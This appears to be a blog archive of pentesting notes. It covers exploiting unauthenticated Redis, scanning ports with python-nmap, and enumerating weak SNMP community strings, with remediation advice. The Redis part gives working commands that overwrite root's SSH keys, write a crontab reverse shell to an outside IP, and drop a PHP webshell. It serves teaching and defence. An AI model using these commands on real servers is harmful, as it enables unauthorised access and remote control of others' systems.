Tag archive: nmap

Exploiting Redis unauthorized access

Exploitation:
Redis exploitation relies mainly on CONFIG SET to change the configuration at runtime: altering the snapshot file name and directory lets an attacker write an SSH key, a webshell, or a crontab entry.
1) If the SSH port is open, a self-generated SSH public key can be written directly into the user's .ssh directory, giving SSH login without authentication.

config set dir /root/.ssh/
config set dbfilename authorized_keys
set xxxx "<generated public key>"
save
exit

2) If the SSH port is not open, the payload can be written into crontab to run a reverse shell.
The method is as follows:

echo -e "\n\n* * * * * /bin/bash -i >& /dev/tcp/192.168.190.201/8888 0>&1\n\n"|/usr/local/bin/redis-cli -h 192.168.192.120 -x set 1
/usr/local/bin/redis-cli -h 192.168.192.120 config set dir /var/spool/cron/
/usr/local/bin/redis-cli -h 192.168.192.120 config set dbfilename root
/usr/local/bin/redis-cli -h 192.168.192.120 save

PS:
Noticed by chance that when the reverse-shell IP is written as 8.8.8.8 the Redis content looks normal:

127.0.0.1:6379> get 1
"\n\n*/1 * * * * bash -i >& /dev/tcp/8.8.8.8/2333 0>&1\n\n\n"

But after persisting with save, what gets written into the cron job is garbled, as shown:

[screenshot of the garbled crontab entry; not reproduced on the page]

Some IPs do not work; 10.10.10.10 and others are also written incorrectly.

3) For web services, if the web root path is known (for example from phpinfo), a shell can be written directly.

[root@vincent src]# ./redis-cli -h 172.16.100.151
172.16.100.151:6379> config set dir /var/www/html/
OK
172.16.100.151:6379> config set dbfilename redis.php
OK
172.16.100.151:6379> set webshell "<?php phpinfo(); ?>"
OK
172.16.100.151:6379> save
OK

Remediation:
1) Do not run Redis as root
2) Set an authentication password on Redis
3) Restrict SSH access from external networks

nmap script:
nmap -p 6379 --script redis-info 127.0.0.1

python-nmap library usage

# -*- coding: utf8 -*-
import time
import nmap  # python-nmap; the target host and port list below are the post's own


def nmapscan(ip):
    nm = nmap.PortScanner()
    # Without an 'arguments' value python-nmap runs nmap with -sV (service/version
    # detection), which is slow; the timing comparison below shows the difference
    nm.scan(hosts=ip, ports='80,3306,9200')
    print(nm.scaninfo())
    print(nm.command_line())
    for host in nm.all_hosts():
        for proto in nm[host].all_protocols():
            # Report only ports nmap marked open, in ascending port order
            for port in sorted(nm[host][proto].keys()):
                if nm[host][proto][port]['state'] == 'open':
                    print(host + ":" + str(port) + " => " + nm[host][proto][port]['name'])


if __name__ == '__main__':
    start = time.time()
    nmapscan('10.59.0.116')
    end = time.time()
    print("程序执行时间:" + str(int(end - start)) + "s")

Output:
[root@server120 tmp]# python thread.py
{'tcp': {'services': '80,3306,9200', 'method': 'syn'}}
nmap -oX - -p 80,3306,9200 -sV 10.59.0.116
10.59.0.116:80 => http
10.59.0.116:9200 => wap-wsp
程序执行时间:90s

The default nmap arguments are:
nmap -oX - -p 80,3306,9200 -sV 10.59.0.116
With -sV nmap tries to detect the service type and exact version on each port, which is slower; the nmap arguments can be changed instead:
nm.scan(hosts=ip, arguments='-sS -p 80,3306,9200')
Output:
[root@server120 tmp]# python thread.py
{'tcp': {'services': '80,3306,9200', 'method': 'syn'}}
nmap -oX - -sS -p 80,3306,9200 10.59.0.116
10.59.0.116:80 => http
10.59.0.116:9200 => wap-wsp
程序执行时间:5s
The execution time is much shorter.
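As an added example that is not code from the original post: the same "host:port => service" listing and the scaninfo() dictionary, obtained by parsing the XML that `nmap -oX -` emits (the format python-nmap parses internally) with only the standard library, so it runs with neither nmap nor python-nmap installed. The XML below is a constructed sample for the post's scan, not real scan output.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -oX -` output for the post's scan (not a real
# scan result); the element layout is the one nmap emits and python-nmap parses.
SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap" args="nmap -oX - -p 80,3306,9200 -sV 10.59.0.116">
  <scaninfo type="syn" protocol="tcp" numservices="3" services="80,3306,9200"/>
  <host>
    <address addr="10.59.0.116" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="3306"><state state="filtered"/><service name="mysql"/></port>
      <port protocol="tcp" portid="9200"><state state="open"/><service name="wap-wsp"/></port>
    </ports>
  </host>
</nmaprun>
"""


def scaninfo(xml_text):
    """Same shape as PortScanner.scaninfo(): {proto: {'method': ..., 'services': ...}}."""
    root = ET.fromstring(xml_text)
    return {si.get("protocol"): {"method": si.get("type"), "services": si.get("services")}
            for si in root.findall("scaninfo")}


def open_ports(xml_text):
    """Return {ip: [(port, proto, service_name), ...]} for open ports, sorted by port."""
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:  # skip hosts reported only by MAC or IPv6 address
            continue
        entries = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not listed, as in the post's script
            service = port.find("service")
            name = service.get("name", "") if service is not None else ""
            entries.append((int(port.get("portid")), port.get("protocol"), name))
        result[addr.get("addr")] = sorted(entries)
    return result


def report_lines(xml_text):
    """The post's 'host:port => service' lines, one per open port."""
    return [f"{ip}:{port} => {name}"
            for ip, entries in open_ports(xml_text).items()
            for port, _proto, name in entries]
```

To use it on a live result, feed it the text returned by running nmap with `-oX -` (for example via subprocess) instead of the sample string.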

Exploiting weak SNMP community strings

Install with yum

yum install -y net-snmp net-snmp-utils

Start SNMP

service snmpd start

Usage on Linux:
snmpwalk -c <SNMP read community string> -v <1|2c, the SNMP version> <IP> <OID (object identifier)>

snmpwalk -v 2c -c public 10.59.0.73

Get memory size

[root@localhost subsys]# snmpwalk -v 2c -c public 10.59.0.73 .1.3.6.1.2.1.25.2.2 
HOST-RESOURCES-MIB::hrMemorySize.0 = INTEGER: 32477184 KBytes

Get IP addresses

[root@localhost subsys]# snmpwalk -v 2c -c public 10.59.0.73 .1.3.6.1.2.1.4.20
IP-MIB::ipAdEntAddr.10.59.0.73 = IpAddress: 10.59.0.73
IP-MIB::ipAdEntAddr.10.81.0.73 = IpAddress: 10.81.0.73
...


On Windows, use a MIB Browser

Remediation advice:

vim /etc/snmp/snmpd.conf
# sec.name source community
# change the default community string "public" on the next line
com2sec notConfigUser default public
[root@server120 ~]# service snmpd restart

Scanning with Nmap

[root@server144 ~]# nmap -sU -p 161 --script=snmp-brute 192.168.192.120

Starting Nmap 5.51 ( http://nmap.org ) at 2017-09-08 11:45 CST
Nmap scan report for localhost (192.168.192.120)
Host is up (0.00083s latency).
PORT    STATE SERVICE
161/udp open  snmp
|_snmp-brute: public
MAC Address: 52:54:00:26:BE:A2 (QEMU Virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds